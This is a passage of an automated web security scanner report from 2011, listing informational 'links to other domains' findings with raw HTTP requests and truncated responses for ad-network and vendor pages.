Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303790964&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303773039355&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303773040402&frm=0&adk=1819763764&ga_vid=891030884.1303773041&ga_sid=1303773041&ga_hid=392787740&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=965&fu=0&ifi=1&dtd=1300&xpc=X6cbSv4zix&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:10:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.lynda.com%26adT%3DJavascript%2BTutorials%26adU%3Dwww.gfi.com/LANguard%26adT%3DScan%2BYour%2BNetwork%26adU%3DBusiness-Software.com/HelpDesk%26adT%3DTop%2B10%2BHelp%2BDesk%2BSoftware%26gl%3DUS&amp;usg=AFQjCNEqKBl9QNQoQSClNj1sY_X_FSuQbw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.46. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303787938&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm&dt=1303769972905&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303769973144&frm=0&adk=1819763764&ga_vid=1352693876.1303769973&ga_sid=1303769973&ga_hid=140809809&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=981&fu=0&ifi=1&dtd=367&xpc=ZDCdrppqDw&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 22:19:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BDatabase%2BServer%26gl%3DUS&amp;usg=AFQjCNH2U_FNRp03hqMCr_3Vy710NVIjWA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.47. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303790964&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303773011983&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303773012140&frm=0&adk=1819763764&ga_vid=352810143.1303773013&ga_sid=1303773013&ga_hid=1092310987&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=965&fu=0&ifi=1&dtd=1206&xpc=3B2hzh6We0&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:10:03 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12831

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.lynda.com%26adT%3DJavascript%2BTutorials%26adU%3Ddice.com/Telefonix%26adT%3DMechanical%2BEngineer%26adU%3DCymphonix.com/Web%252BApplication%252BSecurity%26adT%3DWeb%2BApplication%2BSecurity%26gl%3DUS&amp;usg=AFQjCNF5syUk2HSN1lKdI8q4DIGuAP7qnw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.48. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1072501689/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 12:12:13 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1072501689" target="_blank">learn more</a>
...[SNIP]...
23.49. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...
</noscript>\n');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');
23.50. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sLMxu47t>^)Y[y26^eBmD'@zmWDj/tLAupNA/*ML[uTpu!RrSf1cs(^CZv.tI8q/xu`sW=OZ3z#PJuFGHh*`H$b4vufy:^]C?mQg'K(EMIZ@?3yp9wkpsQnoc@iD:G@#d0Fg7d]E7#M:pj)ZgW:5<tK-pBGD/hdLwyL8Xcmrl6eV=VdoO'kk?Y_l`vu; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:22:47 GMT
Content-Length: 1501

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
</noscript>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
23.51. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
<div>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="611" height="167" wmode="opaque">
        <param name="wmode" value="opaque" />
...[SNIP]...
<div class="name">
<a
href="http://www.ideco-software.ru/products/onlineseminar08_nsd_20110421.html?fr=ban_sem20110419">................. ...... Ideco ICS ... ...... ............ ......</a>
...[SNIP]...
</script>
<script src="http://bs.yandex.ru/resource/watch.js" type="text/javascript"></script>
<noscript>
<img src="http://bs.yandex.ru/watch/35648" border="0" width="1" height="1" alt="">
</noscript>
...[SNIP]...
23.52. http://ioerror.us/bb2-support-key  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ioerror.us
Path:   /bb2-support-key

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bb2-support-key?key=adc1-d6f3-b783-0251 HTTP/1.1
Host: ioerror.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 16:05:45 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Content-Length: 2119

<html>
<head>
<title>Technical Support</title>
<style type="text/css">
body { background: white; color: black; font-size: 12px; font-family: Tahoma,Verdana,Arial,sans-serif; text-align: center; }
#con
...[SNIP]...
<p>Your request was intercepted by <a href="http://www.bad-behavior.ioerror.us/">Bad Behavior</a>
...[SNIP]...
<p>The free <a href="http://www.microsoft.com/security_essentials/">Microsoft Security Essentials</a>
...[SNIP]...
23.53. http://js.dt00.net/public/smi/elastic/24.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.dt00.net
Path:   /public/smi/elastic/24.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /public/smi/elastic/24.js?time=13 HTTP/1.1
Host: js.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:23 GMT
Content-Type: application/x-javascript
Content-Length: 12170
Last-Modified: Mon, 25 Apr 2011 14:30:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:40:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

